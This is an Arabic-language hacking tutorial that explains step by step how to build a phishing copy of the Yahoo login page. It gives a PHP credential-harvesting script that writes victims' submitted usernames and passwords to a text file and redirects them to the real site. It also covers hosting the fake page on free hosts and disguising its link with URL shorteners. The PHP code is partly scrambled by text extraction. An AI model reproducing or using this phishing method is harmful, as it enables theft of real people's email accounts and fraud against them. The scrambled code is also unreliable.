احتراف حماية و اختراق اليميل 2014

• طريقة عمل صفحة مزورة

  الصفحات المزورة هي طريقة مشهورة جدا و صار الكثير يعملون بها و هي طريقة تعمل على غباء

  الضحية لكن احيانا ذكاء الهاكر يفيد كثيرا في اقناع الضحية حتى و لو كان هاكر مثله لكن هناك

  طريقة العمل بالصفحات المزورة بدون اقناع الضحية بالدخول و ما الى غير ذلك و هي طريقة

  احترافية و خطيرة حتى اني اظن ان كبار الهكر يتم سرقة ايميلهم بهذه الطريقة

  ساشرح لكم الن طبيعة عمل هذه الصفحات ...كيفية و صول التبليغ ....

  طبعا كما نعرف ان في الصفحات المزورة التبليغ يصلك انا في صفحات بيضاء و انا افضلها و

  يصلك التبليغ في اليميل .. انا ل احب هذه الطريقة لني عندما اسرق ايميل ل احب ان ادخل

  ايميلي لرؤية المعلومات ثم اغلقه ثم اعادة فتحه ... يمكنك فتح اليميل في متصفح اخر

  كالفايرفوكس حيث تعمل بمتصفحية مثل الوبرا و الفايرفوكس .. الول فيه ايميلك مفتوح و الثاني

  ايميل الضحية لكن عند كثرة الضحايا مثل خمس ضحايا مرة واحدة لن تقوم انت طبعا باستعمال

  خمس متصفحات لذا فتضع الضحايا يصلونك في صفحة اخرى بيضاء .........

  كيفية

  اول و قبل كل شيئ عليك معرفة الصفحة التي تريد تزويرها مثل ياهوو . هوتميل . جمايل.

  فيس بوك.................

  انا ساشرح على صفحة الياهوو لكن ااكد لكم ان كل الصفحات تزور بنفس الطريقة ....

  سياخذك الى الصفحة التالية و هي صفحة ادخال mail اول ندخل موقع الياهوو و نضغط على

  https://login.yahoo.com/config/mail?.src=ym&.intl=fr اليميل و الباس و هي على الرابط التالي

  اوك نروح نحمل الصفحة تابع الصورة التالية .....

  الن نقوم بتحميل الصفحة كاملة

  الن هاهي الصفحة مع الصور التي تحتويها ...

  الن ننتقل الى اهم خطوةو هي تزوير الصفحة ...

  f نفتحها بالمفكرة و نضعط على 3 mail.htm حسنا نروح للصفحة المسماة عندي

  او

  action راح تظهر لنا صفحة للبحث نكتب كلمة trl+f C

  تابع الصورة...........................

  اما الرابط get نروح و نغيرها ل post نشاهد بجاني الكلمة action خلص عملنا بحث لكلمة

  هذه الخطورة code.php نروح نغيره ?https://login.yahoo.com/config/login الذي من الجهة الخرى

  مهمة جدا فركز .. انظر الصورة التالية و هي صورة للملف بعد التغيير.........

  اظن الصورة واضحة و الطريقة واضحة .... يا اخي اذا لم تفهم هذا فلن تفعل شيئا

  اوك ل تستعجل لن ذلك ... code.php اكن لو كنت مكانكم ستتساؤلون لماذا غيرنا الرابط الى

  هو الكود الذي سنستعمله في ارسال المعلومات .....

  اليك الكود....

  php?>

  ;("handle = fopen("pass.txt", "a$

  } (foreach($_GET as $variable => $value

  ;(fwrite($handle, $variable

  ;("=" ,fwrite($handle

  ;(fwrite($handle, $value

  ;("fwrite($handle, "\r\n

  ;"redirect = "https://login.yahoo.com/config/mail?.src=ym&.intl=fr$

  ;(" header("Location:$redirect

  {

  ;("fwrite($handle, "\r\n

  fclose($handle ;(e; xit

  <?

  اوك اشرح لكم الكود

  انتم ترون الرابط هو لفحة الياهو أي الموقع الذي يؤخذ له الضحية بعد ادخال المعلومات اما فوق

  و هو الصفحة التي يصلك فيها التبليغ ...... اما غير ذلك فل يهمنا .. pass.txt كما تجدون كلمة

  code.php نفتح مفكرة و ننقله فيها كما هو و نحفظه بالسم الذي وضعناه في الصفحة المزورة أي

  لم شيئا .............

  أي عند ادخال الضحية للمعلومات code.php ساشرح لكم .. اول وضعنا في الصفة الزورة

  سيرسلك انت و المعلومات الى الكود و الكود سيرسل المعلومات الى الملف

  و يرسل الضحية الى الموقع الذي كتبته انت فوق و من الفضل ان pass.txt

  تكتب الموقع الرئيسي للصفحة حتى يظن الضحية انه اخطا في ادخال

  code.php معلوماته ........ اوك احنا زورنا الصفحة و حفظنا الكود باسم

  بنفس المجلد اللي عليه الصفحة .

  انظر الصورة الصورة ....... pass.txt ..نروح نعمل ملف تكست جديد نسميه

  الن نهينا تزوير الصفحة .تمااااااام ...الن نرفع الصفحة على استضافة و طبعا

  مجانية لننا لن نرفع صفحة مزورة على استضافة مدفوعة.....

  فهي freehostia.com ليكن في علمك ان الستضافات المجانية كثيرة جدا لكن انا انصحكم ب

  الفضل للصفحلت المزورة اعني ل اعلنات و ل شيئ نروح ندخل الموقع

  و نسجل . تابع الصورة....... http://www.freehostia.com

  راح تظهر لنا الصفحة التالية......................

  انظر الصورة في الصفحة الموالية....

  أي دومين use sub domain اول نترك الخانة الولى كما هي 0.00 و الخانة الموالية نكتب

  مجاني

  و راح يكون الدومين V1ru راح تظهر لنا خانة نكتب فيها اسم الدومين مثل 5

  v1ru5.freehostia.com

  اما في الجزء الثاني نمل الخانات المرقمة بالشكل التالي....

  --1 البلد

  --2 اكتب اي شيئ

  --3 اكتب اسمك

  --4 اكتب لقبك

  --5 اكتب ايميلك و هو ضروري صدقني

  --6 رقم الهاتف

  7و 8--اكتب اي شيئ

  --9 اختر واحدة

  --10 رقم بلدك

  ثم عندما نمل الخانات راح تظهر لنا صورة فيها احرف و ارقام ل تظهر عندي في الصورة

  راح تظهر الصورة التالية .... continue ندخل الرقام و الحروف و نضغط على

  بعد ما ينتهي راح تظهر لنا صفحة بهذا الشكل و ان لم تظهر فلقد اخطات بادخال المعلومات

  تابع...

  الن مبروك تسجيلك في الستضافة ..........

  اذهب الن الى اليميل الذي سجلت به سوف تجد رسالة وصلتك من الستضافة و فيها معلومات

  دخلولك الى الستضافة تابع الصورة في الصفحة المقابلة ليس في الصورة ما يشرح ابدا فهي

  واضحة وضوح الشمس .........

  هي اسمك في الستضافة انا باسس فهو الباسوورد login اوك راح اشرحلكم كما ترون كلمة

  الذي تدخلون به للستضافة و فوق تجدون اسم الدومين الخاص بكم ...........................

  اوك الن تمام سجلنا ............

  نروح ندخل موقع الستضافة مرة اخرى و ندخل فوق اليوز الذي ارسلوه لكم في اليميل

  تابعوووواااا الصورة .............. file manager راح ندخل للوحة التحكم ثم

  راح تظهر لنا الصفحة نرى فيها اسم الدومين الخاص بنا . نروح نضغط عليه تاااابع الشرح

  لختيار الصفحة و الكود و الملف تكست و ل ننسى الصور التي مع الصفحة browse نروح ل

  ..... upload ثم بعد اختيار الصفحة نضغط على

  yourdomain.freehostia.com/mail.htm و الرفع نروح للرابط التالي

  هو اسم الدومين اللي yourdomain هو اسم الصفحة التي ترسلونها للضحية و Mail.htm

  سجلتوا به.....

  yourdomain.freehostia.com/pass.txt اما ايميلت الضحايا توصل في الرابط التالي

  هو اسم الملف تكست اللي رفعناه pass طبعا

  الن نشوف مثال عن صفحة التبليغ

  تمام الن زورنا الصفحة و رفعناها لكن هل سترسل الصفحة بذلك الرابط الطويل .. سيشك

  اليك جملة من المواقع لختصار الرابط

  easyURL.net

  Korta ner din url

  www.tighturl.com

  www.ataja.es

  . SimURL.com - Make a shorter URL. Then track it

  Create a short URL | URL Redirection Services | HyperURL.com

  Redirx

  ! dwarfURL - Make your long URL's a lot smaller with dwarfURL's short URL service

  ! IX.lt - shorten your URL for FREE

  www.curio.us

  StartUrl - Small url generator and url redirection

  URL Hawk - Instant Short URL

  ! Welcome to canurl.com

  DecentURL - Making ugly URLs decent

  NanoRef.com

  www.dot.tk

  http://www.9hz.com

  /http://nutshellurl.com

  /http://funkyfilters.com/url/obfuscation

  و اذا لم تعجبك الستضافة اليك مجموعة من الستضافات المجانية

  www.ripway.com

  http://www.11mbit.de

  http://www.110mb.com

  http://www.35mb.com

  /http://www.da_insane.boo.pl/d/upload

  http://www.filebuffer.net

  http://www.filecabi.net/free-video-hosting.html

  http://www.filesupload.com

  http://www.fileupyours.com

  http://www.freeuploader.com

  http://www.myfilestash.com

  http://www.mytempdir.com

  http://www.picapic.net

  http://www.putfile.com

  www.webng.com

  www.eb2a.com

  www.freehostia.com

  www.sqweebs.com

  www.freeweb7.com

  www.webng.com

  www.asphost4free.com

  www.websamba.com

  www.titanichost.com

  يمكنكم استعمال اية واحدة منها

  ليست مجربة كلها لكن ااكد لكم ان فيها ما ينفع لكن افضلهم و اريد ان اقول لكم شيئا حول

  انهما يعطيانك مساحة مجانية تقدر ب 5 جيجا www.p2h.info و الستضافة www.eb2a.com الستضافة

  و هي دائمة أي ليست مثل البقية التي تعطيك مساحة ما لمدة معينة .....